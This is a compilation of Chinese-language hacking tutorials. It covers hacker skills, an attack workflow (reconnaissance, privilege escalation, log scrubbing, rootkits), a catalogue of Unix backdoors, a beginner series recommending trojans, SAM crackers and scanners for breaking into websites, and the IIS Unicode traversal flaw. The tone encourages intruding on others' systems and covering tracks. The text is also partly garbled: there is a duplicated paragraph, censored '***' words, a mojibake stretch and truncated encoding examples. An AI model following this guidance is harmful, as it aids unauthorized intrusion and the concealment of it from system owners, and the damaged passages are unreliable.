看完的人10个有9个成了黑客

　　还有一个是BC

　　然而看完的人

　　视力全下降1度

　　黑客的基本技能

　　１、黑客的精神态度是很重要的，但技术则更是重要。黑客的态度虽然是无可取代，随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变。例如:以往总是会学会用机器码写程序，直到最近我们开始使用HTML。不过，在1996年末,当然，这是基础的hacking技能。在1997年，理所当然的，你必须学会C。但,如果你只是学一种语言，那么你不能算是一位黑客，了不起只能算是一个programmer。除此,你还必须学会学会以独立于任何程序语言之上的概括性观念来思考一件程序设计上的问题。要成为一位真正的黑客，你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言。也就是说，你必会学还了C之外的东西，你至少还要会LISP或Perl(Java也正在努力的挤上这个名单; 译者注: 我很怀疑这份名单)。除了几个重要的hacking常用语言之外，这些语言提供你一些不同的程序设计途径，并且让你在好的 *** 中学习。

　　程序设计是一种复杂的技术，我没辨法在这提供完整的学习步骤。但是我能告诉你一些在书本上和课堂上所没有的东西(有很多，几乎全部更好的黑客们都是自习而来的)。(a) 读别人的程序码；(写程序，这两项是不错的 *** 。学习写程序就像在学习写一种良好的自然语言，更好的 *** 是去看一些专家们所写的东西，然后写一些你自己的东西，然后读更多，再写更多。然后一直持续，一直到你发展出一种属于自己的风格和特色。要找到好的程序码来看是很一件很困难的事，因为，对菜鸟黑客们而言，适于供他们阅读和努力的大型程序的source数量很少。但这事己有了戏剧性的变化了; 现在免费的供应的软件、程序设计工具和操作系统(大都公开提供 source，而且全都是由黑客们写成的)到处可看。进入下一个主题。

　　２、取得一个免费的 UNIX，并学习使用和维护。我先假设你己经有一部个人电脑或者是可以使用任何一部(现在的小孩子真幸福，可如此轻易的拥有 :-))。取得黑客技巧的之一个步骤是取得一份Linux 或者一份免费的 BSD-Unix，并将它安装在自己的机器，并使之顺利的运作。没错，在这个世界上除了Unix之外，还有其它的操作系统。但是他们只提供bianry，你不能看到他们的程序码，你也不能修改他们。想要在DOS或Windows或MacOS开始hacking，无疑就是要你绑著枷锁跳舞一样。

　　除此之外，Unix是Internet上的操作系统。当你在不懂Unix的情况下学习使用Internet时，你没辨法在不懂Unix的情况下成为 Internet的黑客。因为这个原故，现在的黑客文化还是很牢固的以Unix为中心。(这并不完全是正确的，而且有些活在旧时代的黑客甚至也不喜欢这种情形，但是Unix和Internet之间的共生共成己经到了牢不可破的地步，即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些，把Unix装起来吧! (我自己是喜欢Linux，但是还有其它的东东可用。) 学习它，让它运作起来，让它陪你努力精进。用他向整个Internet喊话。看程序码，改程序。

　　有一天你成为一位高竿的黑客，你回头往后看时会发现，你得到比 Microsoft操作系统所能提供的还要好的程序设计工具(包括 C，Lisp和 Perl)。而且得到快乐，并学到比共生共成己经到了牢不可破的地步，即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些，把Unix装起来吧! (我自己是喜欢Linux，但是还有其它的东东可用。) 学习它，让它运作起来，让它陪你努力精进。用他向整个Internet喊话。看程序码，改程序。有一天你成为一位高竿的黑客，你回头往后看时会发现，你得到比Microsoft操作系统所能提供的还要好的程序设计工具(包括 C，Lisp和 Perl)。而且得到快乐，并

　　学到比你想像中的还要多的知识。关于学习Unix，在Loginataka有更多的资料。()

　　看一下Linux distribution的目录或 Linux CD，并把自己交付给它。

　　3、学习使用World Wide Web并学会写 HTML。

　　在黑客文化创造出来的东西，大多在他们的活动范围外被使用著，如,在工厂和辨公室或大学被漠漠的使用著。但Web是一个很大的例外，这个黑客眼中的大玩具甚至还被政客们接受，并巧巧的在改变这个世界。因此(还有很多好的理由)，你必须学习Web。并不只是学习使用browser(这太容易了)而己，还要学会写HTML这个Web的标签语言。如果你不知道如何设计程序，写HTML也可以给一些习惯上的帮助。嗯! 建立home page吧! 不过，有一个home page 并没任何特别之处能让你成为一位黑客。Web上到处都是home page，而且大部份都没什么重点，没什么内容的烂泥 -- 很好看的烂泥巴，但是看起来都一样，差不多。

　　4、至少学会以下的其中两种：

　　一、网站服务器程序ASP、PHP、CGI、jsP

　　我个人认为CGI是最难学的其中一种。

　　二、程序语言：C语言、C++、VB、JAVA、PERL、DELPHI、汇编语言

　　不过我认为C语言的通用性更好，可以跨平台（操作系统）使用。

　　还要试着自己写程序、开发软件等工作。

　　三、数据库管理软件：MYSQL、SQL、FOXPRO……等。

　　四、几种常用的操作系统：WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能学到UNIX那是更好不过的了。最最基本的WIN2K、WINNT也要学会吧。

　　如果以上的你都会了，那么你已经是个高手了

　　黑客初级技术讲解（上）

　　 *** 安全从其本质上来讲就是 *** 上的信息安全。从广义来说，凡是涉及到 *** 上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是 *** 安全的研究领域。确保 *** 系统的信息安全是 *** 安全的目标，信息安全包括两个方面：信息的存储安全和信息的传输安全。信息的存储安全是指信息在静态存放状态下的安全，如是否会被非授权调用等。信息的传输安全是指信息在动态传输过程中安全。为了确保 *** 信息的传输安全，有以下几个问题：

　　（１）对 *** 上信息的监听

　　（２）对用户身份的仿冒

　　（３）对 *** 上信息的篡改

　　（４）对发出的信息予以否认

　　（５）对信息进行重发

　　对于一般的常用入侵 *** 主要有

　　1.口令入侵

　　所谓口令入侵，就是指用一些软件解开已经得到但被人加密的口令文档，不过许多黑客已大量采用一种可以绕开或屏蔽口令保护的程序来完成这项工作。对于那些可以解开或屏蔽口令保护的程序通常被称为“Crack”。由于这些软件的广为流传，使得入侵电脑 *** 系统有时变得相当简单，一般不需要很深入了解系统的内部结构，是初学者的好 *** 。

　　2.特洛伊木马术

　　说到特洛伊木马，只要知道这个故事的人就不难理解，它最典型的做法可能就是把一个能帮助黑客完成某一特定动作的程序依附在某一合法用户的正常程序中，这时合法用户的程序代码已被该变。一旦用户触发该程序，那么依附在内的黑客指令代码同时被激活，这些代码往往能完成黑客指定的任务。由于这种入侵法需要黑客有很好的编程经验，且要更改代码、要一定的权限，所以较难掌握。但正因为它的复杂性，一般的系统管理员很难发现。

　　3.监听法

　　这是一个很实用但风险也很大的黑客入侵 *** ，但还是有很多入侵系统的黑客采用此类 *** ，正所谓艺高人胆大。

　　 *** 节点或工作站之间的交流是通过信息流的转送得以实现，而当在一个没有集线器的 *** 中，数据的传输并没有指明特定的方向，这时每一个 *** 节点或工作站都是一个接口。这就好比某一节点说：“嗨！你们中有谁是我要发信息的工作站。”

　　此时，所有的系统接口都收到了这个信息，一旦某个工作站说：“嗨！那是我，请把数据传过来。”联接就马上完成。

　　目前有 *** 上流传着很多嗅探软件，利用这些软件就可以很简单的监听到数据，甚至就包含口令文件，有的服务在传输文件中直接使用明文传输，这也是非常危险的

　　4.E-mail技术

　　使用email加木马程序这是黑客经常使用的一种手段，而且非常奏效，一般的用户，甚至是网管，对 *** 安全的意识太过于淡薄，这就给很多黑客以可乘之机。

　　5.病毒技术

　　作为一个黑客，如此使用应该是一件可耻的事情，不过大家可以学习，毕竟也是一种攻击的办法，特殊时间，特殊地点完全可以使用。

　　6.隐藏技术

　　 *** 攻击的一般步骤及实例

　　攻击的准备阶段

　　首先需要说明的是，入侵者的来源有两种，一种是内部人员利用自己的工作机会和权限来获取不应该获取的权限而进行的攻击。另一种是外部人员入侵，包括远程入侵、 *** 节点接入入侵等。本节主要讨论远程攻击。

　　进行 *** 攻击是一件系统性很强的工作，其主要工作流程是：收集情报，远程攻击，远程登录，取得普通用户的权限，取得超级用户的权限，留下后门，清除日志。主要内容包括目标分析，文档获取，破解密码，日志清除等技术，下面分别介绍。

　　1.确定攻击的目的

　　攻击者在进行一次完整的攻击之前首先要确定攻击要达到什么样的目的，即给对方造成什么样的后果。常见的攻击目的有破坏型和入侵型两种。破坏型攻击指的只是破坏攻击目标，使其不能正常工作，而不能随意控制目标的系统的运行。要达到破坏型攻击的目的，主要的手段是拒绝服务攻击（Denial Of Service）。另一类常见的攻击目的是入侵攻击目标，这种攻击是要获得一定的权限来达到控制攻击目标的目的。应该说这种攻击比破坏型攻击更为普遍，威胁性也更大。因为黑客一旦获取攻击目标的管理员权限就可以对此服务器做任意动作，包括破坏性的攻击。此类攻击一般也是利用服务器操作系统、应用软件或者 *** 协议存在的漏洞进行的。当然还有另一种造成此种攻击的原因就是密码泄露，攻击者靠猜测或者穷举法来得到服务器用户的密码，然后就可以用和真正的管理员一样对服务器进行访问。

　　2.信息收集

　　除了确定攻击目的之外，攻击前的最主要工作就是收集尽量多的关于攻击目标的信息。这些信息主要包括目标的操作系统类型及版本，目标提供哪些服务，各服务器程序的类型与版本以及相关的社会信息。

　　要攻击一台机器，首先要确定它上面正在运行的操作系统是什么，因为对于不同类型的操作系统，其上的系统漏洞有很大区别，所以攻击的 *** 也完全不同，甚至同一种操作系统的不同版本的系统漏洞也是不一样的。要确定一台服务器的操作系统一般是靠经验，有些服务器的某些服务显示信息会泄露其操作系统。例如当我们通过TELNET连上一台机器时，如果显示

　　Unix（r）System V Release 4．0

　　login：

　　那么根据经验就可以确定这个机器上运行的操作系统为SUN OS 5．5或5．5．l。但这样确定操作系统类型是不准确的，因为有些网站管理员为了迷惑攻击者会故意更改显示信息，造成假象。

　　还有一种不是很有效的 *** ，诸如查询DNS的主机信息（不是很可靠）来看登记域名时的申请机器类型和操作系统类型，或者使用社会工程学的 *** 来获得，以及利用某些主机开放的SNMP的公共组来查询。

　　另外一种相对比较准确的 *** 是利用 *** 操作系统里的TCP/IP堆栈作为特殊的“指纹”来确定系统的真正身份。因为不同的操作系统在 *** 底层协议的各种实现细节上略有不同。可以通过远程向目标发送特殊的包，然后通过返回的包来确定操作系统类型。例如通过向目标机发送一个FIN的包（或者是任何没有ACK 或SYN标记的包）到目标主机的一个开放的端口然后等待回应。许多系统如windows、 BSDI、 CISCO、 HP／UX和 IRIX会返回一个RESET。通过发送一个SYN包，它含有没有定义的TCP标记的TCP头。那么在Linux系统的回应包就会包含这个没有定义的标记，而在一些别的系统则会在收到SYN+BOGU包之后关闭连接。或是利用寻找初始化序列长度模板与特定的操作系统相匹配的 *** 。利用它可以对许多系统分类，如较早的Unix系统是64K长度，一些新的Unix系统的长度则是随机增长。还有就是检查返回包里包含的窗口长度，这项技术根据各个操作系统的不同的初始化窗口大小来唯一确定它们。利用这种技术实现的工具很多，比较著名的有NMAP、CHECKOS、QUESO等。

　　获知目标提供哪些服务及各服务daemon的类型、版本同样非常重要，因为已知的漏洞一般都是对某一服务的。这里说的提供服务就是指通常我们提到的喘口，例如一般 TELNET在23端口，FTP在对21端口，WWW在80端口或8080端口，这只是一般情况，网站管理完全可以按自己的意愿修改服务所监听的端口号。在不同服务器上提供同一种服务的软件也可以是不同，我们管这种软件叫做daemon，例如同样是提供FTP服务，可以使用wuftp、proftp， ncftp等许多不同种类的daemon。确定daemon的类型版本也有助于黑客利用系统漏洞攻破网站。

　　攻击的实施阶段

　　1.获得权限

　　当收集到足够的信息之后，攻击者就要开始实施攻击行动了。作为破坏性攻击，只需利用工具发动攻击即可。而作为入侵性攻击，往往要利用收集到的信息，找到其系统漏洞，然后利用该漏洞获取一定的权限。有时获得了一般用户的权限就足以达到修改主页等目的了，但作为一次完整的攻击是要获得系统更高权限的，这不仅是为了达到一定的目的，更重要的是证明攻击者的能力，这也符合黑客的追求。

　　能够被攻击者所利用的漏洞不仅包括系统软件设计上的安全漏洞，也包括由于管理配置不当而造成的漏洞。前不久，因特网上应用最普及的著名www服务器提供商Apache的主页被黑客攻破，其主页面上的 Powered by Apache图样（羽毛状的图画）被改成了Powered by　Microsoft Backoffice的图样，那个攻击者就是利用了管理员对Webserver用数据库的一些不当配置而成功取得更高权限的。

　　黑客初级技术讲解（中）

　　当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。其中利用缓冲区溢出进行的攻击最为普遍，据统计80％以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。

　　无论作为一个黑客还是一个 *** 管理员，都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击，而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息，可以到诸如Rootshell（等网站去查找。

　　2.权限的扩大

　　系统漏洞分为远程漏洞和本地漏洞两种，远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。这种漏洞的威胁性相当大，黑客的攻击一般都是从远程漏洞开始的。但是利用远程漏洞获取的不一定是更高权限，而往往只是一个普通用户的权限，这样常常没有办法做黑客们想要做的事。这时就需要配合本地漏洞来把获得的权限进行扩大，常常是扩大至系统的管理员权限。

　　只有获得了更高的管理员权限之后，才可以做诸如 *** 监听、打扫痕迹之类的事情。要完成权限的扩大，不但可以利用已获得的权限在系统上执行利用本地漏洞的程序，还可以放一些木马之类的欺骗程序来套取管理员密码，这种木马是放在本地套取更高权限用的，而不能进行远程控制。例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限，那么他就可以在这台机器上放置一个假的su 程序。一旦黑客放置了假su程序，当真正的合法用户登录时，运行了su，并输入了密码，这时root密码就会被记录下来，下次黑客再登录时就可以使用su 变成root了。

　　攻击的善后工作

　　1.日志系统简介

　　如果攻击者完成攻击后就立刻离开系统而不做任何善后工作，那么他的行踪将很快被系统管理员发现，因为所有的 *** 操作系统一般都提供日志记录功能，会把系统上发生的动作记录下来。所以，为了自身的隐蔽性，黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的 *** ，首先要了解常见的操作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置，根据操作系统的不同略有变化

　　／usr／adm——早期版本的Unix。

　　／Var／adm新一点的版本使用这个位置。

　　／Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用这个位置。

　　／etc，大多数Unix版本把Utmp放在此处，一些Unix版本也把Wtmp放在这里，这也是Syslog．conf的位置。

　　下面的文件可能会根据你所在的目录不同而不同：

　　acct或pacct－一记录每个用户使用的命令记录。

　　accesslog主要用来服务器运行了NCSA HTTP服务器，这个记录文件会记录有什么站点连接过你的服务器。

　　aculo保存拨出去的Modems记录。

　　lastlog记录了最近的Login记录和每个用户的最初目的地，有时是最后不成功Login的记录。

　　loginlog一记录一些不正常的L0gin记录。

　　messages——记录输出到系统控制台的记录，另外的信息由Syslog来生成

　　security记录一些使用 UUCP系统企图进入限制范围的事例。

　　sulog记录使用su命令的记录。

　　utmp记录当前登录到系统中的所有用户，这个文件伴随着用户进入和离开系统而不断变化。

　　Utmpx，utmp的扩展。

　　wtmp记录用户登录和退出事件。

　　Syslog最重要的日志文件，使用syslogd守护程序来获得。

　　2.隐藏踪迹

　　攻击者在获得系统更高管理员权限之后就可以随意修改系统上的文件了（只对常规 Unix系统而言），包括日志文件，所以一般黑客想要隐藏自己的踪迹的话，就会对日志进行修改。最简单的 *** 当然就是删除日志文件了，但这样做虽然避免了系统管理员根据IP追踪到自己，但也明确无误地告诉了管理员，系统己经被人侵了。所以最常用的办法是只对日志文件中有关自己的那一部分做修改。关于修改 *** 的具体细节根据不同的操作系统有所区别， *** 上有许多此类功能的程序，例如 zap、 wipe等，其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日志文件中某一用户的信息，使得当使用w、who、last等命令查看日志文件时，隐藏掉此用户的信息。

　　管理员想要避免日志系统被黑客修改，应该采取一定的措施，例如用打印机实时记录 *** 日志信息。但这样做也有弊端，黑客一旦了解到你的做法就会不停地向日志里写入无用的信息，使得打印机不停地打印日志，直到所有的纸用光为止。所以比较好的避免日志被修改的办法是把所有日志文件发送到一台比较安全的主机上，即使用loghost。即使是这样也不能完全避免日志被修改的可能性，因为黑客既然能攻入这台主机，也很可能攻入loghost。

　　只修改日志是不够的，因为百密必有一漏，即使自认为修改了所有的日志，仍然会留下一些蛛丝马迹的。例如安装了某些后门程序，运行后也可能被管理员发现。所以，黑客高手可以通过替换一些系统程序的 *** 来进一步隐藏踪迹。这种用来替换正常系统程序的黑客程序叫做rootkit，这类程序在一些黑客网站可以找到，比较常见的有 LinuxRootKit，现在已经发展到了5.0版本了。它可以替换系统的ls、ps、netstat、inetd等等一系列重要的系统程序，当替换了 ls后，就可以隐藏指定的文件，使得管理员在使用ls命令时无法看到这些文件，从而达到隐藏自己的目的。

　　3.后门

　　一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点，黑客会留下一个后门，特洛伊木马就是后门的更好范例。Unix中留后门的 *** 有很多种，下面介绍几种常见的后门，供 *** 管理员参考防范。

　　密码破解后门

　　这是入侵者使用的最早也是最老的 *** ，它不仅可以获得对Unix机器的访问，而且可以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号，这些新的帐号仍然可能是重新侵入的后门。多数情况下，入侵者寻找口令薄弱的未使用帐号，然后将口令改的难些。当管理员寻找口令薄弱的帐号是，也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。

　　Rhosts + + 后门

　　在连网的Unix机器中，象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证 *** 。用户可以轻易的改变设置而不需口令就能进入。入侵者只要向可以访问的某用户的rhosts文件中输入"+ +"，就可以允许任何人从任何地方无须口令便能进入这个帐号。特别当home目录通过NFS向外共享时，入侵者更热中于此。这些帐号也成了入侵者再次侵入的后门。许多人更喜欢使用Rsh，因为它通常缺少日志能力. 许多管理员经常检查 "+ +"，所以入侵者实际上多设置来自网上的另一个帐号的主机名和 用户名，从而不易被发现。

　　校验和及时间戳后门

　　早期，许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依@@时间戳和系统校验和的程序辨别一个二进制文件是否已被改变，如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨回到原文件时间，然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与原来的精确同步，就可以把系统时间设回当前时间。Sum程序是基于CRC校验，很容易骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被大多数人推荐的，MD5使用的算法目前还没人能骗过。

　　黑客初级技术讲解（下）

　　Login后门

　　在Unix里，login程序通常用来对 telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改，使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令，它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号，甚至是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的，所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后，便用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令，使strings命令失效Telnetd后门

　　当用户telnet到系统，监听端口的inetd服务接受连接随后递给in.telnetd，由它运行 login.一些入侵者知道管理员会检查login是否被修改，就着手修改in.telnetd. 在in.telnetd内部有一些对用户信息的检验，比如用户使用了何种终端. 典型的终端设置是Xterm或者VT100.入侵者可以做这样的后门，当终端设置为"letmein"时产生一 个不要任何验证的shell. 入侵者已对某些服务作了后门，对来自特定源端口的连接产 生一个shell。

　　服务后门

　　几乎所有 *** 服务曾被入侵者作过后门. Finger，rsh，rexec，rlogin，ftp，甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell，通过后门口令就能获取访问。这些程序有时用刺娲□？Ucp这样不用的服务，或者被加入inetd.conf 作为一个新的服务，管理员应该非常注意那些服务正在运行，并用MD5对原服务程序做校验。

　　Cronjob后门

　　Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序使它在1AM到2AM之间运行，那么每晚有一个小时可以获得访问。也可以查看cronjob中经常运行的合法程序，同时置入后门。

　　库后门

　　几乎所有的UNIX系统使用共享库，共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门；象 login.c这样的程序调用了 crypt()。当使用后门口令时产生一个shell。因此，即使管理员用MD5检查login程序，仍然能产生一个后门函数，而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验，有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以当MD5读这些文件时，校验和一切正常，但当系统运行时将执行trojan版本的，即使trojan库本身也可躲过MD5校验，对于管理员来说有一种 *** 可以找到后门，就是静态编连MD5校验程序然后运行，静态连接程序不会使用trojan共享库。

　　内核后门

　　内核是Unix工作的核心，用于库躲过MD5校验的 *** 同样适用于内核级别，甚至连静态 连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的，所幸的是内核的 后门程序还不是随手可得，每人知道它事实上传播有多广。

　　文件系统后门

　　入侵者需要在服务器上存储他们的掠夺品或数据，并不能被管理员发现，入侵者的文章常是包括exploit脚本工具，后门集，sniffer日志， email的备分，原代码，等等！有时为了防止管理员发现这么大的文件，入侵者需要修补"ls"，"du"，"fsck"以隐匿特定的目录和文件，在很低的级别，入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分，且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件，对于普通的管理员来说，很难发现这些"坏扇区"里的文件系统，而它又确实存在。

　　Boot块后门

　　在PC世界里，许多病毒藏匿与根区，而杀病毒软件就是检查根区是否被改变。Unix下，多数管理员没有检查根区的软件，所以一些入侵者将一些后门留在根区。

　　. 所以更多的管理员是 用MD5校验和检测这种后门的。

　　隐匿进程后门

　　入侵者通常想隐匿他们运行的程序，这样的程序一般是口令破解程序和监听程序 (sniffer)，有许多办法可以实现，这里是较通用的: 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将sniffer程序改名类似in.syslog再执行，因此当管理员用"ps"检查运行进程时，出现的是标准服务名。可以修改库函数致使 "ps"不能显示所有进程，可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是

　　amod.tar.gz :

　　 *** 通行. 这些 *** 通行后 门有时允许入侵者通过防火墙进行访问。有许多 *** 后门程序允许入侵者建立某个端 口号并不用通过普通服务就能实现访问. 因为这是通过非标准 *** 端口的通行，管理 员可能忽视入侵者的足迹. 这种后门通常使用TCP，UDP和ICMP，但也可能是其他类型报文。

　　TCP Shell 后门

　　入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下，他们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat 命令查看当前的连接状态，那些端口在侦听，目前连接的来龙去脉. 通常这些后门可 以让入侵者躲过TCP Wrapper技术. 这些后门可以放在 *** TP端口，许多防火墙允许 e-mail通行的.

　　UDP Shell 后门

　　管理员经常注意TCP连接并观察其怪异情况，而UDP Shell后门没有这样的连接，所以 netstat不能显示入侵者的访问痕迹，许多防火墙设置成允许类似DNS的UDP报文的通行，通常入侵者将UDP Shell放置在这个端口，允许穿越防火墙。

　　ICMP Shell 后门

　　Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器，入侵者可以放数据入Ping的ICMP 包，在ping的机器间形成一个shell通道，管理员也许会注意到Ping包暴风，但除了他查看包内数据，否者入侵者不会暴露。

　　加密连接

　　管理员可能建立一个sniffer试图某个访问的数据，但当入侵者给 *** 通行后门加密后，就不可能被判定两台机器间的传输内容了。

　　基础知识（1）

　　我认为这是一套适合初学者由浅到深的文章，所以强烈推荐给大家，作者从基础讲到最近比较火的漏洞，可能有些人看来是浅了些，但是的确很适合想干点啥但又不知道怎么办的菜鸟们。

　　之一节，伸展运动。这节 *** 们要准备道具，俗话说：“工欲善其事，必先利其器”（是这样吗？哎！文化低……）说得有道理，我们要学习黑客技术，一点必要的工具必不可少。

　　1，一台属于自己的可以上网的电脑。这样你可以有充分的支配权，上网不用说，否则你怎么看到我的文章？wap呵呵！属于自己很重要，否则安全性是个很大的问题。之一点相信大家没有问题。

　　2， windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的！（当然，我也是铁杆game fan)对 *** 支持极差，命令受限制，很多软件又不能用，对黑客来说使用起来绊手绊脚，非常不利。这里我推荐2000，这是一个很成熟的系统（漏洞还是有一堆）。推荐双系统，这样黑玩搭配，干活不累。

　　3，冰河。中国之一木马，中者数不胜数，国人骄傲。虽然用冰河根本不能算黑客，但它确实能培养你对黑客的兴趣，同时帮助你了解 *** ，相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错，大家仔细看看。而且，以后你学会入侵服务器后，用冰河操作也会减少工作量（我是懒虫，爽！）

　　4，oicq。我们学黑客，可不是学泡mm!bfctx你………… 息怒息怒！我们当然是学黑客，但不要忘了，众人拾柴火更高，我们通过cshu的成员列表，互相联系帮助，对提高水平很有帮助！另外我要废话一句：据我了解，现在黑客网站下载最多的都是针对oicq的破解工具，我个人认为很无聊，偷个密码代表什么，浪费时间！最后补充：mm不能不泡。（谁砸我？）

　　5，superscan。很好用的端口扫描器，速度超快，功能一流，一旦拥有，别无所求……（打住！）不论是找木马受害者，还是扫服务器端口，它都非常有效，cshu强烈推荐！

　　6，一本笔记本/便条，网上资料相当多，黑客处理的也是非常之多。良好的习惯决定了你的效率，准备一本笔记本，记录下你的成果，肉鸡，木马利用，命令，密码……坚持一下，你会发现你的效率大幅上升的！

　　7，lc3.著名nt/2000sam破解程序，有时我们拿不到足够权限，又没好办法，那么lc3是更好的解决办法，只要你拿的到sam，你就是服务器它爷爷！本站有其破解程序，支持了暴力破解！

　　8，程序合并。这是玩木马必需的，虽然木马是很低的手段，但有时配合巧办法（以后我会介绍）确实能够达到意想不到的效果，朋友们可以在空闲时玩玩木马，很有趣，若你能巧妙的骗过mm,那么webmaster也可能被你骗倒：〉（比较理想化）

　　9，流光4for 2000/nt。可能是世界上更好的综合类黑软！中国的骄傲，它集成了很全的漏洞信息，速度快， *** 多，对有漏洞的主机是毁灭性的打击，操作又方便，是快速黑站必不可少的精品工具。超级吐血推荐！

　　10，良好的心态，稳定的情绪，刻苦钻研的精神，刨根问底的作风，打扫房间的习惯。黑客是门很高深的学问，不要幻想一步登天，失败是常有的事，千万不可灰心。在那么多黑软的包围下，切不可完全依赖他们，一定要了解它们利用什么原理工作。对任何一个小问题，小细节，一定要问清楚，cshu就是给大家互相交流的场所哦！黑完后不要得意忘形，打扫战场也很重要，以防万一。

　　之一节操完，可能很无聊，我就这点水平，大家见谅！这里我说一句大话：做完菜鸟操，包你会黑简单的站（哎哟！心慌了！）

　　下一节 *** 们要介绍如何掌握一台主机的基本信息，期待中……

　　真是太对不起大家了，隔了那么久才写这篇教程，我这几天实在太忙，大家还是体谅一下我吧，好了，开始做操。

　　今天的内容是获得主机的信息。 我们要黑一台主机，首先要了解它的信息，包括它的类型，用户列表，目录，端口，漏洞等等。

　　首先我们我们要找一台主机来练手，随便挑吧！(乱说的)

　　之一部，呵呵，先在ie里看看吧，mmmm.....做的还行，挺精致的！主要是我们肯定了它现在是正常的。然后，我们应该知道它的ip,很简单，ping它一下就可以了。

　　ping 看看窗口里有了什么？是不是有三行回应，其中的111.111.222.222就是ip了（还是胡说的，一个例子）。有人是不是要问，我这里怎么没有。那可能是两个原因，之一，你打错命令了；第二，该主机装了防火墙，禁止ping,不过这种可能很小。

　　知道了ip，下一步应该确定端口了。下面是一些常用的端口的默认值

　　21--ftp 重要哦

　　23--telnet 欢呼吧

　　25- *** tp 尽管重要，但似乎没什么可利用的

　　53--domain 同上

　　79--finger 可知道用户信息了

　　80--http 要看网页，没它不行吧

　　110--pop 收信的

　　139--netbios 共享用的，很有利用价值哦

　　3389--win2000超级终端 呵呵，这个好！

　　其实端口有上千种，这些最最常用

　　我们怎么知道服务器有什么端口打开呢？去找个扫描器吧，x-scan ,super scan,flux等等很多哦。这里我推荐super scan ，速度很快，本站也有其教程哦！用法还是比较傻瓜的，估计大家不会有问题，轻轻几点，打开的端口就出现了。不错不错，上面说到的都有（太理想化了吧!）

　　那么我们该如何应对呢？

　　ps:忘了说一声，顺便扫一下7626,冰河有也说不准哦：）

　　若有ftp,那就用用匿名登陆。自己动手也行，更好用x-scan flux等吧！反正，有ftp就有一份希望

　　telnet 在！好!telnet 111.111.222.222，出现窗口了吧！嗯？要密码@蠢赐芑共皇浅蹲⒁馕拿饔糜铮海┧姹悴赂觯砹耍寥耍湵捩摯湵捩摯榬獩椮煤牦湯灴条硥整摮敩捳湡牢 牢戼 戼湵捩摯痚楮潣敤

　　基础知识（2）

　　今天我们谈谈unicode漏洞，这可是基础中的基础，重点里的重点，不懂的一定要好好学。

　　2000年10月17日中联绿盟发布了以下的安全公告：

　　微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞

　　远程漏洞：是

　　本地漏洞：是

　　发布日期：2000年10月17日

　　更新日期：2000年10月17日

　　受影响的版本：

　　Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

　　这可是中国乃至全球 *** 安全界的一次大变节，入侵nt/2000系统变得如此简单，不打补丁的死路一条。

　　下面开始正式学习：

　　一，UNICODE漏洞的原理

　　此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，中国台湾繁体中文也同样存在这样的漏洞。

　　中文版的WIN2000中，UNICODE编码 存在BUG，在UNICODE 编码中

　　 -〉 (0xc1 - 0xc0) * 0x40 + 0x1c=0x5c='/'

　　/ -〉 (0xc0 - 0xc0) * 0x40 + 0x2f=0x2f='\'

　　在NT4中/编码为

　　在英文版里： WIN2000英文版

　　在中文win2k里：

　　此外还有多种编码，不一一阐述。

